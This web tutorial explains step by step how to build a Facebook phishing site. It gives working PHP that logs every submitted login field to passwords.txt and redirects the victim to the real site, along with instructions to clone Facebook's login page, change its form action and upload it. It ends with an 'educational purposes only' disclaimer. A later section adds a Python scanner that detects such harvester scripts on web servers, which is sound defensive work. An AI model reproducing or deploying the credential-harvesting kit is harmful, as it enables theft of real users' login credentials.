Phishing is a form of social engineering in which a criminal hacker tries to trick the user into clicking a malicious link, downloading an infected attachment, or divulging sensitive or confidential information.
The goal is to steal sensitive data like credit card and login information, or to install malware on the victim’s machine.
Here is the easiest way to set up a phishing website. We will take Facebook as an example.
First of all, we need to create the log file for the passwords. Open a notepad, leave it empty and save it as passwords.txt.
Second, open another new notepad and copy these lines of PHP code:
<?php
header(“Location: https://www.facebook.com/settings?tab=security “);
$handle = fopen(“passwords.txt”, “a”);
foreach($_POST as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, “=”);
fwrite($handle, $value);
fwrite($handle, “\r\n”);
}
fwrite($handle, “\r\n”);
fclose($handle);
exit;
?>
Remember the name of the text file that we saved earlier. In this case, it will be passwords.txt. Edit it accordingly, and save the notepad as get_password_and_redirect.php. Take note of the .php extension.
Next, we need to create a website similar to Facebook. The simplest way is by duplicating the original website. Just go to www.facebook.com and save the main page. The file name should be index.html.
Then, we need to do some minor edit on the index.html. Open it on notepad and find these lines – form id=”login_form”. Delete the lines in the action function – “http://www.facebook.com/login…………..110” and save the file.
Now we need to upload these files into a web server. Once uploaded, you are done.
To test whether it is working or not, just go to the link and enter your username and password to log in. It will redirect you to your actual Facebook account. But what you will not notice is that it saves the login details in the passwords.txt file. Go and see it for yourself.
That’s all for now. This tutorial is for educational purposes only.
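From the defender's side, the script described above has a recognisable shape on a web server: a Location redirect, a file opened in append mode, and a loop that writes every $_POST field to that file. This added example (not code from the original page) is a Python scanner that flags .php files combining those traits and reports the file they append to; the regexes, the threshold of 3, and both samples are assumptions constructed for illustration.

```python
import re
from pathlib import Path

# Quote class also covers typographic quotes, which copy-pasted kits often carry.
Q = "[\"'“”‘’]"
# Traits of the script shown above; each is weak alone, telling in combination.
TRAITS = {
    "redirect": re.compile(r"header\s*\(\s*" + Q + r"\s*Location\s*:\s*https?://", re.I),
    "append_open": re.compile(r"fopen\s*\([^)]*,\s*" + Q + r"a[bt+]*" + Q, re.I),
    "post_loop": re.compile(r"foreach\s*\(\s*\$_(?:POST|REQUEST)\b", re.I),
    "file_write": re.compile(r"\b(?:fwrite|fputs|file_put_contents)\s*\(", re.I),
}
DROP = re.compile(r"fopen\s*\(\s*" + Q + r"([^\"'“”‘’]+)" + Q + r"\s*,\s*" + Q + "a", re.I)

def traits(source):
    """Names of harvester traits found in one PHP source string."""
    return [name for name, rx in TRAITS.items() if rx.search(source)]

def drop_file(source):
    """File the script appends to, so responders can locate captured data."""
    m = DROP.search(source)
    return m.group(1) if m else None

def scan_webroot(root, threshold=3):
    """Map each suspect .php path under root to (traits, drop file)."""
    findings = {}
    for path in Path(root).rglob("*.php"):
        text = path.read_text(encoding="utf-8", errors="replace")
        found = traits(text)
        if len(found) >= threshold:
            findings[str(path)] = (found, drop_file(text))
    return findings

# Constructed samples (placeholder URL and file name, quotes kept as on the page).
SUSPECT = """<?php
header(“Location: https://example.com/ ”);
$handle = fopen(“drop.txt”, “a”);
foreach($_POST as $variable => $value) {
fwrite($handle, $variable);
}
"""
BENIGN = """<?php
if ($_POST['token'] !== $_SESSION['token']) { exit; }
header("Location: https://example.com/thanks");
"""

if __name__ == "__main__":
    print(traits(SUSPECT), drop_file(SUSPECT))
    print(traits(BENIGN), drop_file(BENIGN))
```

A hit is a lead for review, not proof: confirm by checking whether the reported file exists beside the script and is readable over HTTP, since that means the captured credentials are exposed to anyone.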